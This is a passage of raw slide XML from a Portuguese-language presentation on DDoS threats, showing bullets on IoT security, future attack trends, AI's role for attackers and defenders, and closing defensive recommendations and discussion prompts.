        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="5629275"/>
            <a:ext cx="3457575" cy="9144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68" name="Text 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343525" y="5715000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Iniciativas de Melhoria</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6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43525" y="5923955"/>
            <a:ext cx="42863" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Text 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5414963" y="5923955"/>
            <a:ext cx="164881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Regulamentações de segurança para IoT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7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43525" y="6066830"/>
            <a:ext cx="42863" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Text 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5414963" y="6066830"/>
            <a:ext cx="1705626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Frameworks de certificação de dispositivos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="73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43525" y="6209705"/>
            <a:ext cx="42863" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Text 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5414963" y="6209705"/>
            <a:ext cx="151511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Atualizações automáticas de firmware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75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3525" y="6352580"/>
            <a:ext cx="42863" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Text 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5414963" y="6352580"/>
            <a:ext cx="176785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Segmentação de redes para dispositivos IoT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Text 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="685800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Futuro do DDoS: Tendências Emergentes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Shape 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="7586663"/>
            <a:ext cx="8572500" cy="28575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3A6EA5">
              <a:alpha val="50000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Shape 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="7543800"/>
            <a:ext cx="114300" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3A6EA5"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Shape 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2857500" y="7543800"/>
            <a:ext cx="114300" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3A6EA5"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Shape 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="7543800"/>
            <a:ext cx="114300" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3A6EA5"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Shape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286500" y="7543800"/>
            <a:ext cx="114300" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3A6EA5"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Shape 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8001000" y="7543800"/>
            <a:ext cx="114300" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3A6EA5"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Shape 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714375" y="7172325"/>
            <a:ext cx="857250" cy="501848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85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138" y="7245548"/>
            <a:ext cx="85725" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Text 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="7359848"/>
            <a:ext cx="8143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IA para Otimização de Ataques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Shape 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4143375" y="7172325"/>
            <a:ext cx="857250" cy="630436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88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9138" y="7245548"/>
            <a:ext cx="85725" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Text 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4200525" y="7359848"/>
            <a:ext cx="8143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via Dispositivos Quânticos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Shape 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7572375" y="7172325"/>
            <a:ext cx="857250" cy="501848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91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8138" y="7245548"/>
            <a:ext cx="85725" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Text 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7629525" y="7359848"/>
            <a:ext cx="8143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via Redes Espaciais</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Shape 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2428875" y="7527727"/>
            <a:ext cx="857250" cy="501848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94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14638" y="7600950"/>
            <a:ext cx="85725" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Text 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2486025" y="7715250"/>
            <a:ext cx="8143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Defesas Autônomas com IA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Shape 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5857875" y="7527727"/>
            <a:ext cx="857250" cy="501848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97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32922" y="7600950"/>
            <a:ext cx="107156" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Text 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5915025" y="7715250"/>
            <a:ext cx="8143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Redes Auto-Curativas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Shape 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="8315325"/>
            <a:ext cx="8572500" cy="117157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0" name="Shape 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="8315325"/>
            <a:ext cx="28575" cy="117157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01" name="Text 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="8429625"/>
            <a:ext cx="8415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Papel da Inteligência Artificial</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Text 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="8658225"/>
            <a:ext cx="4186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Atacantes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103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0050" y="8838605"/>
            <a:ext cx="42863" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Text 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471488" y="8838605"/>
            <a:ext cx="1882211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Geração de tráfego que imita padrões legítimos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="105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0050" y="8981480"/>
            <a:ext cx="42863" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Text 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471488" y="8981480"/>
            <a:ext cx="177262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automática de vetores de ataque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="107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0050" y="9124355"/>
            <a:ext cx="42863" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Text 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471488" y="9124355"/>
            <a:ext cx="1491509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Adaptação em tempo real às defesas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="109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0050" y="9267230"/>
            <a:ext cx="42863" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Text 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471488" y="9267230"/>
            <a:ext cx="138669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Identificação de alvos de alto valor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Text 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4629150" y="8658225"/>
            <a:ext cx="4186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Defensores</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="112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29150" y="8838605"/>
            <a:ext cx="42863" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="Text 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4700588" y="8838605"/>
            <a:ext cx="1472310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de anomalias mais precisa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11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629150" y="8981480"/>
            <a:ext cx="42863" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Text 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4700588" y="8981480"/>
            <a:ext cx="1648699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Ajuste automático de regras de mitigação</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="116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29150" y="9124355"/>
            <a:ext cx="42863" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Text 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4700588" y="9124355"/>
            <a:ext cx="1596405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Previsão de ataques antes que escalem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="118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629150" y="9267230"/>
            <a:ext cx="42863" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Text 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4700588" y="9267230"/>
            <a:ext cx="1853552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 coordenada entre múltiplos sistemas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Shape 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="977265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21" name="Text 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="985837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22" name="Text 85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357797" y="9858375"/>
            <a:ext cx="5718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13/14</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7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3437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Conclusão e Perguntas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Recapitulação e discussão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5600700" cy="254317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254317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" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="1571625"/>
            <a:ext cx="54435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Pontos-Chave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400050" y="2000250"/>
            <a:ext cx="285750" cy="285750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2078831"/>
            <a:ext cx="128588" cy="12858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2956" y="1907381"/>
            <a:ext cx="11446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Evolução Contínua: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92956" y="1907381"/>
            <a:ext cx="500804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ataques DDoS evoluíram de simples incômodos para ameaças cibernéticas complexas e potencialmente devastadoras, com volumes que agora ultrapassam 3.8 Tbps.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="2543175"/>
            <a:ext cx="285750" cy="285750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5" y="2621756"/>
            <a:ext cx="144661" cy="1285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92956" y="2536031"/>
            <a:ext cx="120829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Complexa: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792956" y="2536031"/>
            <a:ext cx="502077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Desde o recrutamento de botnets até a execução do ataque, compreender a estrutura e as fases é essencial para construir defesas eficazes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="3000375"/>
            <a:ext cx="285750" cy="285750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" y="3078956"/>
            <a:ext cx="128588" cy="1285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92956" y="2993231"/>
            <a:ext cx="122135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Defesa em Camadas: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792956" y="2993231"/>
            <a:ext cx="502702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Não existe uma bala de prata contra DDoS. A mitigação eficaz requer uma estratégia proativa, em camadas, combinando medidas básicas e tecnologias avançadas.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400050" y="3457575"/>
            <a:ext cx="285750" cy="285750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" y="3536156"/>
            <a:ext cx="128588" cy="12858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2956" y="3450431"/>
            <a:ext cx="884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Futuro com IA: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792956" y="3450431"/>
            <a:ext cx="49125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inteligência artificial terá papel cada vez mais proeminente tanto nos ataques quanto nas defesas, tornando a batalha mais automatizada e sofisticada.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285750" y="4171950"/>
            <a:ext cx="5600700" cy="24145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29" name="Text 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="4314825"/>
            <a:ext cx="5386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Considerações Finais</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="4600575"/>
            <a:ext cx="53863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resiliência contra DDoS não é um estado final, mas um processo contínuo de vigilância, adaptação e investimento em segurança. A colaboração entre organizações, provedores de serviços e a comunidade de segurança é vital para compartilhar inteligência de ameaças e desenvolver contramedidas eficazes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Shape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="5229225"/>
            <a:ext cx="5314950" cy="120015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2" name="Text 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="542925" y="5343525"/>
            <a:ext cx="5157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Recomendações Práticas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody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5600700"/>
            <a:ext cx="100013" cy="100013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00088" y="5572125"/>
            <a:ext cx="330144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Desenvolva um plano de resposta a incidentes DDoS antes que ocorram</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788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5800725"/>
            <a:ext cx="100013" cy="100013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700088" y="5772150"/>
            <a:ext cx="37797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Implemente monitoramento contínuo e estabeleça linhas de base de tráfego normal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788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" y="6000750"/>
            <a:ext cx="100013" cy="100013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700088" y="5972175"/>
            <a:ext cx="395186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Considere soluções híbridas que combinam proteção on-premise e baseada em nuvem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788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6200775"/>
            <a:ext cx="100013" cy="100013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700088" y="6172200"/>
            <a:ext cx="29904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Mantenha-se atualizado sobre novas técnicas de ataque e defesa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6057900" y="1457325"/>
            <a:ext cx="2800350" cy="28717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2" name="Text 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6200775" y="1600200"/>
            <a:ext cx="2586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Perguntas?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7115175" y="1885950"/>
            <a:ext cx="685800" cy="68580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625" y="2057400"/>
            <a:ext cx="342900" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Text 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6200775" y="2686050"/>
            <a:ext cx="25860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Momento para discussão e esclarecimento de dúvidas sobre o conteúdo apresentado.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6200775" y="3143250"/>
            <a:ext cx="2514600" cy="10287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47" name="Text 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286500" y="3228975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Sugestões de tópicos para discussão:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4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0" y="3446859"/>
            <a:ext cx="50006" cy="100013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6365081" y="3443288"/>
            <a:ext cx="153900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Experiências com ataques DDoS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody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0" y="3618309"/>
            <a:ext cx="50006" cy="100013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6365081" y="3614738"/>
            <a:ext cx="158351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Desafios específicos de mitigação</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5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3789759"/>
            <a:ext cx="50006" cy="100013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6365081" y="3786188"/>
            <a:ext cx="1411309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Novas tendências observadas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5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3961209"/>
            <a:ext cx="50006" cy="100013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6365081" y="3957638"/>
            <a:ext cx="118887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Soluções implementadas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Shape 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6057900" y="4486275"/>
            <a:ext cx="2800350" cy="2228850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3A6EA5">
              <a:alpha val="15000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Text 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6143625" y="4572000"/>
            <a:ext cx="2700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Material Complementar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1013" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Shape 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7029450" y="4857750"/>
            <a:ext cx="857250" cy="8572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30000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5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3066" y="5200650"/>
            <a:ext cx="150019" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Text 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6143625" y="580072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Acesse o documento de apoio completo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Text 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6143625" y="597217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Exemplos de código e recursos adicionais</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Text 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
